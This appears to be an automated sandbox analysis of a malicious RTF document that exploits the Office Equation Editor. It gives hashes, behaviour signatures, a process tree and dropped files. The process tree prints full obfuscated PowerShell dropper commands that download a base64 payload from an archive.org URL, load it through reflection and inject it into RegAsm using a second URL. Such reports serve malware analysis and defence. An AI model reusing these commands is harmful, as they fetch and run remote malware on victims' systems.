Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-09-2024 17:17

General

  • Target

    nicepersonforeverybodylovethepersontogetmebackwithentirebeautifuldaysgivenmesuchagoodthingstounderst.rtf

  • Size

    83KB

  • MD5

    6584d78630c4842b775ead6ce3010211

  • SHA1

    91b34cb911ffe4a2e8bdfd16a1411276de11e923

  • SHA256

    24c3c8fc3a0420632056016cba54ad89e88b294ae3d3466b8727098fb74d5258

  • SHA512

    93aa8779e4f27233620aeea38abd43d179c99d7e2aa5222d221d075835f903075d916e9726f42738fd2d18b8c24d610d54b69d0969ad5352b29a860ce585f06f

  • SSDEEP

    768:AcmtHKW1Z3bNhsfbAYTDHrsaSHo1i9q/jud:Acm9BLjbOj1ig/6d

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\nicepersonforeverybodylovethepersontogetmebackwithentirebeautifuldaysgivenmesuchagoodthingstounderst.rtf"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2216
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:756
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2652
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicepersonontheworkforgetread.vBS"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2664
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVudjpDT21TUEVjWzQsMjQsMjVdLUpvaU4nJykoKCgneycrJzB9JysndXJsID0nKycgezEnKyd9aCcrJ3R0cHM6Ly9pJysnYTYwJysnMDEwJysnMC51Jysncy5hcicrJ2NoaXZlLm9yZycrJy8yNC9pdGUnKydtcycrJy9kZXRhaC1ub3RlLXYnKycvJysnRGV0JysnYWhObycrJ3RlVicrJy50eCcrJ3R7MScrJ307ezB9YmEnKydzJysnZTY0Q29udGVudCAnKyc9IChOJysnZXctT2JqJysnZScrJ2N0IFN5JysncycrJ3RlbScrJy5OJysnZXQuV2ViQ2xpZW4nKyd0KScrJy5EJysnb3cnKydubCcrJ28nKydhZFN0cicrJ2luJysnZyh7MH11cmwnKycpO3snKycwfWJpbmFyeUNvbicrJ3RlbnQgPSBbU3lzdGVtLkMnKydvbnZlJysncnRdOicrJzpGcm8nKydtJysnQmFzZTY0JysnU3RyaW5nJysnKHswJysnfWInKydhc2UnKyc2JysnNEMnKydvbnQnKydlJysnbnQpO3swfScrJ2EnKydzc2UnKydtYmx5ID0nKycgW1JlJysnZmxlYycrJ3QnKydpb24uJysnQXMnKydzJysnZW1ibHldOjpMb2EnKydkJysnKHsnKycwfWJpbmFyeUNvbnRlbnQpO3swfScrJ3R5cGUgPScrJyB7MH1hc3NlbWInKydseS4nKydHZXRUeXBlJysnKHsxJysnfVJ1blBFLkhvbWV7MX0pO3swfW1ldGgnKydvZCcrJyA9IHswJysnfScrJ3QnKyd5cGUnKycuR2V0TScrJ2V0JysnaG9kKHsxfVZBSXsxfSk7ezB9bWV0aCcrJ29kLicrJ0ludm9rZSh7MCcrJ31udScrJ2wnKydsLCBbJysnbycrJ2InKydqZScrJ2MnKyd0JysnWycrJ11dQCcrJygnKyd7MX0nKyd0eHQnKycuJysnQVRPJysnTUVSLycrJzA1NC8yNCcrJzEuJysnODknKycuNDMxJysnLicrJzE5Ly86cHR0aCcrJ3sxfScrJyAsIHsxfWRlc2F0JysnaXZhZG97MScrJ30gJysnLCB7MScrJ31kZScrJ3NhdCcrJ2l2JysnYWRvezF9ICwgezF9ZCcrJ2UnKydzJysnYXQnKydpdicrJ2Fkb3sxfScrJyx7MX1SZWdBc217MX0seycrJzEnKyd9JysnezF9KSknKSAtZltDSEFSXTM2LFtDSEFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2536
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $Env:COmSPEc[4,24,25]-JoiN'')((('{'+'0}'+'url ='+' {1'+'}h'+'ttps://i'+'a60'+'010'+'0.u'+'s.ar'+'chive.org'+'/24/ite'+'ms'+'/detah-note-v'+'/'+'Det'+'ahNo'+'teV'+'.tx'+'t{1'+'};{0}ba'+'s'+'e64Content '+'= (N'+'ew-Obj'+'e'+'ct Sy'+'s'+'tem'+'.N'+'et.WebClien'+'t)'+'.D'+'ow'+'nl'+'o'+'adStr'+'in'+'g({0}url'+');{'+'0}binaryCon'+'tent = [System.C'+'onve'+'rt]:'+':Fro'+'m'+'Base64'+'String'+'({0'+'}b'+'ase'+'6'+'4C'+'ont'+'e'+'nt);{0}'+'a'+'sse'+'mbly ='+' [Re'+'flec'+'t'+'ion.'+'As'+'s'+'embly]::Loa'+'d'+'({'+'0}binaryContent);{0}'+'type ='+' {0}assemb'+'ly.'+'GetType'+'({1'+'}RunPE.Home{1});{0}meth'+'od'+' = {0'+'}'+'t'+'ype'+'.GetM'+'et'+'hod({1}VAI{1});{0}meth'+'od.'+'Invoke({0'+'}nu'+'l'+'l, ['+'o'+'b'+'je'+'c'+'t'+'['+']]@'+'('+'{1}'+'txt'+'.'+'ATO'+'MER/'+'054/24'+'1.'+'89'+'.431'+'.'+'19//:ptth'+'{1}'+' , {1}desat'+'ivado{1'+'} '+', {1'+'}de'+'sat'+'iv'+'ado{1} , {1}d'+'e'+'s'+'at'+'iv'+'ado{1}'+',{1}RegAsm{1},{'+'1'+'}'+'{1}))') -f[CHAR]36,[CHAR]39) )"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2708

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      949a7a915c4e2cb996e9dc2946ce735d

      SHA1

      8227d398f625ac5e7f8bc66a87ef73bcf07ce0c4

      SHA256

      3ece84fd53e9674513bf31220fe800c01434514b7676b7ad2b1aab11c8079cfb

      SHA512

      d5278290139875061eb9c2cff2de9c21f051cb5b297ecd91d352e0d2f55e877238f3d2a1fde46551bb8c3d19ffca0efeab074c1e7532f80bf9dbc3ef33015da9

    • C:\Users\Admin\AppData\Roaming\nicepersonontheworkforgetread.vBS

      Filesize

      207KB

      MD5

      73c5fd4481680b69e0ea300744e85e86

      SHA1

      42eda1ad2cd18b0a34451951728d76b90c9f07b6

      SHA256

      f193bfc26d4a4bf50276a27a873fd0f7941b10b6306ee515bf1f786dce2a4d76

      SHA512

      f905e540102e6bc414a24121d03a279642f5cc54b4db4ca60a2f808864121efdb7e38d6e6b73f42211c4b31493bcec215b2ee82eefcba30d70500221320ada10

    • memory/2216-0-0x000000002F591000-0x000000002F592000-memory.dmp

      Filesize

      4KB

    • memory/2216-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2216-2-0x00000000717CD000-0x00000000717D8000-memory.dmp

      Filesize

      44KB

    • memory/2216-19-0x00000000717CD000-0x00000000717D8000-memory.dmp

      Filesize

      44KB